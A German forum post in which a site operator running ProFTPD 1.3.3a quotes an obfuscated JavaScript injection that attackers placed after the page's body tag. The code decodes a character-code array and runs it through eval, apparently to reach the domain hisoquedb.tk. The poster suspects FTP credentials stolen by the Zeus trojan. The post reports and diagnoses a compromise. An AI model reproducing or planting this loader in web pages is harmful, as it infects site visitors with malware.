Ich habe hier gerade einen ProFTPD 1.3.3a bei dem das Problem auftritt:
header:
01: <body id="home">
02: <!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
03: i=2-2;if(x){fr="fromChar";f=[4,0,89,102,89,106,100,91,99,107,36,108,105,95,105,92
04: 30,28,51,95,91,105,87,98,92,22,104,105,89,50,25,94,105,107,102,47,38,37,111,96,89,93,107,101,1
05: 1,89,87,97,88,100,104,37,100,97,38,99,86,96,100,35,103,94,101,25,22,99,88,99,90,52,24,60,102,1
06: 1,92,99,91,84,96,99,23,23,105,88,105,101,97,99,95,99,94,51,23,88,107,105,102,24,21,93,104,86,1
07: 0,91,87,102,104,89,92,104,50,25,100,100,25,22,86,99,95,92,101,51,23,90,91,99,107,91,103,25,22,
08: 3,92,95,92,95,106,50,25,40,23,23,109,94,91,106,93,52,24,39,25,52,49,38,95,91,105,87,98,92,52,2
09: ,32,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=S
10: ring;z=((e)?"Code":"");zx=fr+z;for(;166-5+5-i>0;i+=1){j=i;if(e)s=s+r	
11: ;zx]((w[j]*1+(9+e("j%3"))));}
12: if(x&&f&&012===10)e(s);</script><!--/c3284d-->
NoScript blockiert eine Verbindung zu hisoquedb.tk. Der Code wird direkt hinter dem Body-Tag eingefügt.
Ich halte den Paßwortdiebstahl über Zeus für wahrscheinlich, da nur ein FTP-Zugang betroffen war, aber eine Sicherheitslücke im FTP-Server ist nicht auszuschließen.
Nebelwolf
Lesezeichen